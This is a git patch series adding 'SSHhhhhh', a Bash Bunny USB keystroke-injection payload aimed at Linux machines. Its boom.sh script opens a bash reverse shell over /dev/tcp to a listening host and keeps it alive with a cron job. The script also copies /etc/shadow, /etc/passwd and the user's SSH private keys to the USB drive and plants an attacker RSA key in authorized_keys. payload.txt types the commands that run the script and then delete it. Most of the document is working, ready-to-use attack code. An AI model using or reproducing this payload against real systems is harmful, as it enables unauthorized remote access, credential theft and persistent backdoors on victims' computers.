From 3ed306ef999d0b3d1a2d842f20287d4de6b9c9de Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:51:04 -0400 Subject: [PATCH 01/15] Added SSHhhhhh (Linux) to the library Plant your RSA key into the victim's authorized_keys, schedule a reverse shell via CRON and grab the contents of the .ssh folder. --- .../remote_access/SSHhhhhh (Linux)/boom.sh | 47 +++++++++++++++++ .../SSHhhhhh (Linux)/payload.txt | 52 +++++++++++++++++++ .../remote_access/SSHhhhhh (Linux)/readme.md | 24 +++++++++ 3 files changed, 123 insertions(+) create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt create mode 100644 payloads/library/remote_access/SSHhhhhh (Linux)/readme.md diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh new file mode 100644 index 00000000..11ecc635 --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh @@ -0,0 +1,47 @@ +#!/bin/bash + +# Main Payload + +# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +REVERSESHELL=true +LHOST='10.20.20.104' # Reverse Shell listening host IP +LPORT='4444' # Reverse Shell listening host port +CRON='30 */1 * * *' # Just the timing portion of the CRON job +RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2' +ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces +DT=$(date "+%Y.%m.%d-%H.%M.%S") +DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT + +if [ "$REVERSESHELL" = true ] ; then + # Create reverse shell script + echo "#!/bin/bash"> .config/rs.sh ; + echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ; + chmod +x /home/$USER/.config/rs.sh ; + + # Add task to CRON that launches the Reverse_TCP script on a schedule for persistence + crontab -l > crontab.tmp ; + if grep -Fq .config/rs.sh crontab.tmp; then + echo 'Update in progress.' + else + echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ; + crontab crontab.tmp ; + fi + rm -f crontab.tmp ; +fi + +# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later) +mkdir $DN ; +ip addr > $DN/ip-addr.txt ; +whoami > $DN/whoami.txt ; +cat /etc/passwd > $DN/etc-passwd.txt ; +cat /etc/shadow > $DN/etc-shadow.txt ; +uname -a > $DN/uname-a.txt ; +route -n > $DN/route-n.txt ; +cp /home/$USER/.ssh/* $DN/. ; + +# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence +if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then + echo 'Update almost completed.' +else + echo $RSA_KEY >> .ssh/authorized_keys ; +fi diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt new file mode 100644 index 00000000..e7548d8e --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt @@ -0,0 +1,52 @@ +# Title: SSHhhhhh +# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors +# Author: WWVB +# Props: Hak5Darren +# Version: 1.0 +# Category: Exfiltration w/Persistence +# Target: Linux Ubuntu 18.04 LTS +# Attackmodes: HID, Storage + +#!/bin/bash + +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +LED STAGE1 +QUACK DELAY 500 +QUACK CTRL-ALT t +QUACK DELAY 100 + +# Drop primary payload on the box +QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh . +QUACK ENTER +QUACK DELAY 50 + +QUACK STRING chmod +x boom.sh +QUACK ENTER +QUACK DELAY 50 + +LED ATTACK + +# Light the fuse and wait!! +QUACK STRING ./boom.sh +QUACK ENTER +QUACK DELAY 1000 + +# Cleanup +LED CLEANUP +QUACK STRING rm boom.sh +QUACK ENTER +QUACK DELAY 100 + +# Bye Felicia! +QUACK STRING umount '/media/$USER/BashBunny' +QUACK ENTER +QUACK DELAY 25 + +QUACK STRING exit +QUACK ENTER +QUACK DELAY 25 + +LED FINISH diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md new file mode 100644 index 00000000..1eb09821 --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -0,0 +1,24 @@ +# SSHhhhhh + +# Author: WWVB +# Version: Version 1.0 + +# Description + +# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) + Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) + +# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) + whoami + ip addr + route -n + /etc/passwd + /etc/shadow (on the off chance you get a root terminal) + uname -a + + Two opportunites for persistence are injected: + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job + added that calls it on a schedule (aka Call Me Later) + +# Configuration = HID STORAGE From c52ce015de9bb83d31a1486783e3ec665dca704d Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:52:28 -0400 Subject: [PATCH 02/15] Update readme.md --- .../library/remote_access/SSHhhhhh (Linux)/readme.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 1eb09821..7d6889f2 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -1,14 +1,14 @@ # SSHhhhhh -# Author: WWVB -# Version: Version 1.0 +## Author: WWVB +## Version: Version 1.0 -# Description +## Description -# Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) +## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) -# Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) +## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami ip addr route -n @@ -21,4 +21,4 @@ Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) -# Configuration = HID STORAGE +## Configuration = HID STORAGE From 3ee2668f7e2c4a480302fb1e0725ea0356cd60d7 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:53:57 -0400 Subject: [PATCH 03/15] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 7d6889f2..8ef28aba 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,19 +6,19 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) - Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) - whoami - ip addr - route -n - /etc/passwd - /etc/shadow (on the off chance you get a root terminal) - uname -a +whoami +ip addr +route -n +/etc/passwd +/etc/shadow (on the off chance you get a root terminal) +uname -a - Two opportunites for persistence are injected: - Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) - Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job - added that calls it on a schedule (aka Call Me Later) +Two opportunites for persistence are injected: +Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) +Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job + added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From d31b0174b74cbd55e977cb9790a4ab5e5881652d Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:56:37 -0400 Subject: [PATCH 04/15] Update readme.md --- .../library/remote_access/SSHhhhhh (Linux)/readme.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 8ef28aba..f2e59109 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -9,12 +9,12 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) -whoami -ip addr -route -n -/etc/passwd -/etc/shadow (on the off chance you get a root terminal) -uname -a + whoami + ip addr + route -n + /etc/passwd + /etc/shadow (on the off chance you get a root terminal) + uname -a Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From fa33a23a72af1b1c957ad682682592f22ab16716 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:57:48 -0400 Subject: [PATCH 05/15] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index f2e59109..8a2e74d0 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,19 +6,18 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) - whoami - ip addr - route -n - /etc/passwd - /etc/shadow (on the off chance you get a root terminal) - uname -a +### whoami +### ip addr +### route -n +### /etc/passwd +### /etc/shadow (on the off chance you get a root terminal) +### uname -a -Two opportunites for persistence are injected: -Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) -Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job - added that calls it on a schedule (aka Call Me Later) +###Two opportunites for persistence are injected: +###Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) +###Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From 32d7801f0ea4c01e9576bbf8fc4d841f3af79eae Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 08:59:09 -0400 Subject: [PATCH 06/15] Update readme.md --- .../remote_access/SSHhhhhh (Linux)/readme.md | 25 ++++++++++++------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 8a2e74d0..d679a838 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -9,15 +9,22 @@ ###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) -### whoami -### ip addr -### route -n -### /etc/passwd -### /etc/shadow (on the off chance you get a root terminal) -### uname -a + whoami + + ip addr + + route -n + + /etc/passwd + + /etc/shadow (on the off chance you get a root terminal) + + uname -a -###Two opportunites for persistence are injected: -###Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) -###Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) +Two opportunites for persistence are injected: + + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) + + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) ## Configuration = HID STORAGE From 470fd8a0cea1f41a562d062fac6dd76dfe40ee4c Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:00:28 -0400 Subject: [PATCH 07/15] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index d679a838..efa9e49e 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,7 +6,7 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -###Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami @@ -21,7 +21,7 @@ uname -a -Two opportunites for persistence are injected: +##Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From 40a9afa7c47a8d343ef3314a59e4ce3ef0d2eaae Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:01:09 -0400 Subject: [PATCH 08/15] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index efa9e49e..944aaaf9 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -21,7 +21,7 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not install uname -a -##Two opportunites for persistence are injected: +## Two opportunites for persistence are injected: Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) From 230a677aa3acf64fa31f1ae1c5d087234f047b23 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Tue, 26 Mar 2019 09:42:49 -0400 Subject: [PATCH 09/15] Update readme.md --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 944aaaf9..5fdc0c34 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -6,7 +6,7 @@ ## Description ## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) -Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [noting major]) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major]) ## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) whoami From f9d4737fc0f4cc2d5c77fbee5f4fe83b5fdb12cc Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Thu, 28 Mar 2019 10:30:47 -0400 Subject: [PATCH 10/15] Added ARP data to the loot --- payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh index 11ecc635..a1b7fc82 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh @@ -33,6 +33,7 @@ fi mkdir $DN ; ip addr > $DN/ip-addr.txt ; whoami > $DN/whoami.txt ; +cat /proc/net/arp > $DN/arp.txt ; cat /etc/passwd > $DN/etc-passwd.txt ; cat /etc/shadow > $DN/etc-shadow.txt ; uname -a > $DN/uname-a.txt ; From 16efe8b05beeb54957e2c5675b5d553444d184a1 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Thu, 28 Mar 2019 10:31:55 -0400 Subject: [PATCH 11/15] Added ARP to loot --- payloads/library/remote_access/SSHhhhhh (Linux)/readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md index 5fdc0c34..8f1064aa 100644 --- a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md +++ b/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md @@ -13,6 +13,8 @@ Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not install ip addr + arp data + route -n /etc/passwd From 83f8d9cb43e35c533c3c2b96a8725e7a3d7637bc Mon Sep 17 00:00:00 2001 From: WWVB Date: Thu, 27 Jun 2019 20:20:28 -0400 Subject: [PATCH 12/15] Renamed directory to remove space. --- .../remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/boom.sh | 0 .../{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/payload.txt | 0 .../{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/readme.md | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/boom.sh (100%) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/payload.txt (100%) rename payloads/library/remote_access/{SSHhhhhh (Linux) => SSHhhhhh-(Linux)}/readme.md (100%) diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/boom.sh rename to payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/payload.txt rename to payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt diff --git a/payloads/library/remote_access/SSHhhhhh (Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md similarity index 100% rename from payloads/library/remote_access/SSHhhhhh (Linux)/readme.md rename to payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md From 1c2199298a07fd6ccd9aa02943c83da8ca7ff760 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Sat, 24 Aug 2024 09:49:52 -0400 Subject: [PATCH 13/15] Update payload.txt Added BashBunny drive label variable as suggested by @hak5peaks --- .../library/remote_access/SSHhhhhh-(Linux)/payload.txt | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt index e7548d8e..3509faa1 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -1,12 +1,14 @@ # Title: SSHhhhhh # Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors # Author: WWVB -# Props: Hak5Darren -# Version: 1.0 +# Props: Hak5Darren, hak5peaks +# Version: 1.1 # Category: Exfiltration w/Persistence # Target: Linux Ubuntu 18.04 LTS # Attackmodes: HID, Storage +DRIVE_LABEL="BashBunny" + #!/bin/bash LED SETUP @@ -19,7 +21,7 @@ QUACK CTRL-ALT t QUACK DELAY 100 # Drop primary payload on the box -QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh . +QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh . QUACK ENTER QUACK DELAY 50 From e9a07640013dfcfcd2c10dc420a03147ef9b6b74 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:46:23 -0400 Subject: [PATCH 14/15] Update boom.sh Set the RSA_KEY variable to a placeholder value, with instructions as to how the RSA public key info is found, per @hak5peaks suggestion --- payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh index a1b7fc82..82643fc0 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh @@ -3,11 +3,11 @@ # Main Payload # Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named REVERSESHELL=true LHOST='10.20.20.104' # Reverse Shell listening host IP LPORT='4444' # Reverse Shell listening host port CRON='30 */1 * * *' # Just the timing portion of the CRON job -RSA_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkmgAxtb8fYA7Bbk+Cs0X+gR43gYbbzdHg7AesoOF5Q95mcbiL7mu79FG4fO7Tnrtl2ARCFJZo8bphbEiSVC/zMPNqgP0trXJld2vbbpRWT8vMsysT4dgAssp9zosJdIR7y0akKByglcVPcaCub/KcQo1mtOq/HNkJ8DOmBeLNHYsL6X0HG2Zccid21DQq4dTMnKAqQrJUCPNRrE2tAx/C0E8SsVtq3cjp6T0H8AINLaHUnmAAI02PLjCZeQ6xUqnpAhgPMymwpjQ66O5EM+Vf5UlhFULn0jmlVnhxNULvYQHfRLY6YhTgVVPSxNUp+sWhyRJ1tx0nAEoJh82gwJ7J engineering@kali-2' ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces DT=$(date "+%Y.%m.%d-%H.%M.%S") DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT From 70eac91d25c738e43a32448cac4d7d45e3d052a3 Mon Sep 17 00:00:00 2001 From: WWVB <48934034+WWVB@users.noreply.github.com> Date: Mon, 26 Aug 2024 19:52:49 -0400 Subject: [PATCH 15/15] Update payload.txt Implemented the $DRIVE_LABEL variable into the umount command, per @hak5peaks suggestion --- payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt index 3509faa1..1033e110 100644 --- a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -43,7 +43,7 @@ QUACK ENTER QUACK DELAY 100 # Bye Felicia! -QUACK STRING umount '/media/$USER/BashBunny' +QUACK STRING umount '/media/$USER/$DRIVE_LABEL' QUACK ENTER QUACK DELAY 25